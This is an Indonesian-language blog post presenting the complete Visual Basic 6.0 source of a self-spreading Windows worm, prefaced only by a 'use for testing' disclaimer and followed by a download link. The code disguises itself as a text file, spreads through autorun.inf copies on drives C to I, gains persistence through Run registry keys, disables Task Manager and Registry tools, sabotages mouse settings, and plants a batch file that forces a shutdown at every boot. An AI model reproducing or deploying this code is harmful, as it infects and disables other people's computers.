Rabu, 27 Juli 2011

Scrip Virus Menggunakan Visual Basic 6.0

Warning....!
Tolong Digunakan Sekedar Pengujian Saja dan Kerusakan yang ditimbulkan bukan tanggung jawab saya...


'Win32 Created by Nofri Eka Yuliandi
'Padang 14 Juli 2011

Private Sub Form_Load()
On Error Resume Next
Call Bat
Call infect
Call pesan
Call console
Call mouse

FileCopy WormFile, "C:\WINDOWS\System32\Information.txt.exe"
MkDir ("C:\WINDOWS\system32\Directory")

Dim file As String
file = "C:\WINDOWS\system32\Directory\autorun.inf"
Open file For Output As #1
Print #1, "[Autorun]"
Print #1, "Open=Information.txt.exe"
Close (1)

Dim gambar As String
gambar = "C:\WINDOWS\system32\Directory\Desktop.ini"
Open gambar For Output As #1
Print #1, "[{BE098140-A513-11D0-A3A4-00C04FD706EC}]"
Print #1, "iconarea_image=1.bmp"
Print #1, "iconarea_text=0xFF00FF"
Close (1)

Dim baca As String
baca = "C:\WINDOWS\system32\Directory\Readme.txt"
Open baca For Output As #1
Print #1, "INDONESIAN VIRUS SOCIETY AND WORM WRITTER COMMUNITY"
Print #1, "==================================================="
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, "1.Peringatan ini ditujukan pada seluruh pengguna Komputer di Dunia,"
Print #1, "  Bahwa hari ini telah terjadi sesuatu yang ganjil pada System Operasi"
Print #1, "  yang anda gunakan!!!."
Print #1, ""
Print #1, "2.Ini masih Peringatan kecil bagi orang-orang yang tidak menyadari keberadaanku."
Print #1, ""
Print #1, "3.Segala sesuatunya sudah tersusun rapi, sehingga anda bingung harus melakukan apa."
Print #1, ""
Print #1, "4.Jangan salahkan saya bila ini terjadi, tetapi salahkan diri anda sendiri,"
Print #1, "  Mengapa terlalu ceroboh untuk melakukan suatu tindakan."
Print #1, ""
Print #1, "5.Saya akan menemani hari-harimu yang sunyi di setiap saat....."
Print #1, ""
Print #1, "6.Jika anda merasa keberatan, Jangan ragu-ragu untuk mengunjungi sites saya"
Print #1, "  www.xxnx.com, atau email : pendekar_blank@yahoo.com."
Print #1, ""
Print #1, "7.Saya ucapkan selamat and Congratulations bagi anda yang telah memilih saya"
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, "15 Juli 2011,by Indi60_Server"
Close (1)

Dim Warning As String
Warning = "C:\WINDOWS\System32\Command32.bat"
Open Warning For Output As #1
Print #1, "@echo off"
Print #1, "title Indi60_Server"
Print #1, "echo WARNING!!!, Komputer anda telah saya kuasai. . .!!!"
Print #1, "echo Jangan Pernah menganggap sesuatu yang kecil dianggap enteng!!!"
Print #1, "echo Kecerobohanmu membuat aku semakin semangat untuk menjagamu!!!"
Print #1, "echo Aku akan menjadi Mimpi indahmu. . .malam ini, dan selamanya. . ."
Print #1, "echo Kamu gak akan bisa lari dari kenyataan ini!!!"
Print #1, "echo."
Print #1, "echo Kamu telah banyak membuat aku Menderita!!!"
Print #1, "echo Kamu selalu membuatku terhina!!!"
Print #1, "echo Aku gak akan membalasnya dengan dendam, akan tetapi,"
Print #1, "echo Hanya kado kecil ini yang akan aku berikan padamu"
Print #1, "echo Terimalah dengan senyum kehancuran!!!"
Print #1, "echo."
Print #1, "echo Persetan Dengan Cinta!!!"
Print #1, "echo Persetan Dengan Perasaan!!!"
Print #1, "echo Persetan Dengan Hati!!!"
Print #1, "echo Apa kamu sendiri punya hati Nurani???"
Print #1, "echo Apa Kamu sendiri punya Perasaan???"
Print #1, "echo Omong kosong dengan CINTA!!!"
Print #1, "echo Fuck!!! is LOVE!!!"
Print #1, "echo Fuck!!! is Heart!!!"
Print #1, "echo Fucking to you and All!!!"
Print #1, "echo."
Print #1, "echo Waktumu hanya sebentar!!!"
Print #1, "shutdown -s -t 60 -f "
Print #1, "pause>nul"
Close (1)
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Call RegDisable
Call DisableTaskmgr
End Sub

Private Sub Timer2_Timer()
On Error Resume Next
If Len(Dir$("C:\Bobol_ATM.txt")) = 0 Then
FileCopy WormFile, "C:\Bobol_ATM.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\Readme.txt", "C:\Readme.txt"
End If

If Len(Dir$("D:\Bobol_ATM.txt")) = 0 Then
FileCopy WormFile, "D:\Bobol_ATM.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\Readme.txt", "D:\Readme.txt"
End If

If Len(Dir$("E:\Bobol_ATM.txt")) = 0 Then
FileCopy WormFile, "E:\Bobol_ATM.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\Readme.txt", "E:\Readme.txt"
End If

If Len(Dir$("F:\Bobol_ATM.txt")) = 0 Then
FileCopy WormFile, "F:\Bobol_ATM.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\Readme.txt", "F:\Readme.txt"
End If

If Len(Dir$("G:\Bobol_ATM.txt")) = 0 Then
FileCopy WormFile, "G:\Bobol_ATM.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\Readme.txt", "G:\Readme.txt"
End If

If Len(Dir$("H:\Bobol_ATM.txt")) = 0 Then
FileCopy WormFile, "H:\Bobol_ATM.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\Readme.txt", "H:\Readme.txt"
End If

If Len(Dir$("I:\Bobol_ATM.txt")) = 0 Then
FileCopy WormFile, "I:\Bobol_ATM.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\Readme.txt", "I:\Readme.txt"
End If
End Sub

Private Sub Timer3_Timer()
On Error Resume Next
FileCopy WormFile, "C:\Information.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\autorun.inf", "C:\autorun.inf"
FileCopy "C:\WINDOWS\system32\Directory\Desktop.ini", "C:\Desktop.ini"
FileCopy "C:\WINDOWS\Prairie Wind.bmp", "C:\1.bmp"
SetAttr ("C:\Information.txt.exe"), vbHidden + vbSystem + vbArchive
SetAttr ("C:\autorun.inf"), vbHidden + vbSystem + vbArchive
SetAttr ("C:\Desktop.ini"), vbHidden + vbSystem + vbArchive
SetAttr ("C:\1.bmp"), vbHidden + vbSystem + vbArchive

FileCopy WormFile, "D:\Information.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\autorun.inf", "D:\autorun.inf"
FileCopy "C:\WINDOWS\system32\Directory\Desktop.ini", "D:\Desktop.ini"
FileCopy "C:\WINDOWS\Prairie Wind.bmp", "D:\1.bmp"
SetAttr ("D:\Information.txt.exe"), vbHidden + vbSystem + vbArchive
SetAttr ("D:\autorun.inf"), vbHidden + vbSystem + vbArchive
SetAttr ("D:\Desktop.ini"), vbHidden + vbSystem + vbArchive
SetAttr ("D:\1.bmp"), vbHidden + vbSystem + vbArchive

FileCopy WormFile, "E:\Information.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\autorun.inf", "E:\autorun.inf"
FileCopy "C:\WINDOWS\system32\Directory\Desktop.ini", "E:\Desktop.ini"
FileCopy "C:\WINDOWS\Prairie Wind.bmp", "E:\1.bmp"
SetAttr ("E:\Information.txt.exe"), vbHidden + vbSystem + vbArchive
SetAttr ("E:\autorun.inf"), vbHidden + vbSystem + vbArchive
SetAttr ("E:\Desktop.ini"), vbHidden + vbSystem + vbArchive
SetAttr ("E:\1.bmp"), vbHidden + vbSystem + vbArchive

FileCopy WormFile, "F:\Information.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\autorun.inf", "F:\autorun.inf"
FileCopy "C:\WINDOWS\system32\Directory\Desktop.ini", "F:\Desktop.ini"
FileCopy "C:\WINDOWS\Prairie Wind.bmp", "F:\1.bmp"
SetAttr ("F:\Information.txt.exe"), vbHidden + vbSystem + vbArchive
SetAttr ("F:\autorun.inf"), vbHidden + vbSystem + vbArchive
SetAttr ("F:\Desktop.ini"), vbHidden + vbSystem + vbArchive
SetAttr ("F:\1.bmp"), vbHidden + vbSystem + vbArchive

FileCopy WormFile, "G:\Information.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\autorun.inf", "G:\autorun.inf"
FileCopy "C:\WINDOWS\system32\Directory\Desktop.ini", "G:\Desktop.ini"
FileCopy "C:\WINDOWS\Prairie Wind.bmp", "G:\1.bmp"
SetAttr ("G:\Information.txt.exe"), vbHidden + vbSystem + vbArchive
SetAttr ("G:\autorun.inf"), vbHidden + vbSystem + vbArchive
SetAttr ("G:\Desktop.ini"), vbHidden + vbSystem + vbArchive
SetAttr ("G:\1.bmp"), vbHidden + vbSystem + vbArchive

FileCopy WormFile, "H:\Information.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\autorun.inf", "H:\autorun.inf"
FileCopy "C:\WINDOWS\system32\Directory\Desktop.ini", "H:\Desktop.ini"
FileCopy "C:\WINDOWS\Prairie Wind.bmp", "H:\1.bmp"
SetAttr ("H:\Information.txt.exe"), vbHidden + vbSystem + vbArchive
SetAttr ("H:\autorun.inf"), vbHidden + vbSystem + vbArchive
SetAttr ("H:\Desktop.ini"), vbHidden + vbSystem + vbArchive
SetAttr ("H:\1.bmp"), vbHidden + vbSystem + vbArchive

FileCopy WormFile, "I:\Information.txt.exe"
FileCopy "C:\WINDOWS\system32\Directory\autorun.inf", "I:\autorun.inf"
FileCopy "C:\WINDOWS\system32\Directory\Desktop.ini", "I:\Desktop.ini"
FileCopy "C:\WINDOWS\Prairie Wind.bmp", "I:\1.bmp"
SetAttr ("I:\Information.txt.exe"), vbHidden + vbSystem + vbArchive
SetAttr ("I:\autorun.inf"), vbHidden + vbSystem + vbArchive
SetAttr ("I:\Desktop.ini"), vbHidden + vbSystem + vbArchive
SetAttr ("I:\1.bmp"), vbHidden + vbSystem + vbArchive
End Sub

Function RegString(HiveAndKey As String, Value As String)
Dim newbie As Variant
Set newbie = CreateObject("Wscript.Shell")
newbie.regwrite HiveAndKey, Value
End Function

Function RegDword(HiveAndKey As String, Value As Integer)
Dim newbie As Variant
Set newbie = CreateObject("Wscript.Shell")
newbie.regwrite HiveAndKey, Value, "REG_DWORD"
End Function

Private Sub RegDisable()
On Error Resume Next
RegDword "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\" & _
    "System\DisableRegistryTools", 1
End Sub

Private Sub DisableTaskmgr()
On Error Resume Next
RegDword "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\" & _
    "System\DisableTaskMgr", 1
End Sub

Private Sub infect()
On Error Resume Next
RegString "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinSys32", "C:\WINDOWS\System32\Information.txt.exe"
End Sub

Private Sub Bat()
On Error Resume Next
RegString "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Message", "C:\WINDOWS\System32\Command32.bat"
End Sub

Private Sub pesan()
On Error Resume Next
RegString "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "INDONESIAN VIRUS SOCIETY AND WORM WRITTER (c)2008"
RegString "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Computer infect by Virus!!!Please Visit my sites www.xxnx.com" & _
"If you Genius!!!Start Cleanning Your Computer now!!!I don't help you. . .be your Self...and Good Luck!!!Thank You Verry much..."
End Sub

Private Sub console()
On Error Resume Next
RegDword "HKCU\Console\FullScreen", 1
RegDword "HKCU\Console\ScreenColors", 10
End Sub

Private Sub mouse()
On Error Resume Next
RegString "HKCU\Control Panel\Mouse\DoubleClickWidth", "-40000"
RegString "HKCU\Control Panel\Mouse\MouseSensitivity", "40000"
End Sub

Private Function WormFile()
Dim WPath, WName As String
WPath = App.Path
If Right(WPath, 1) <> "\" Then
WPath = WPath & "\"
End If
WName = App.EXEName & ".exe"
WormFile = WPath & WName
End Function

Download Lengkapnya

0 komentar:

Posting Komentar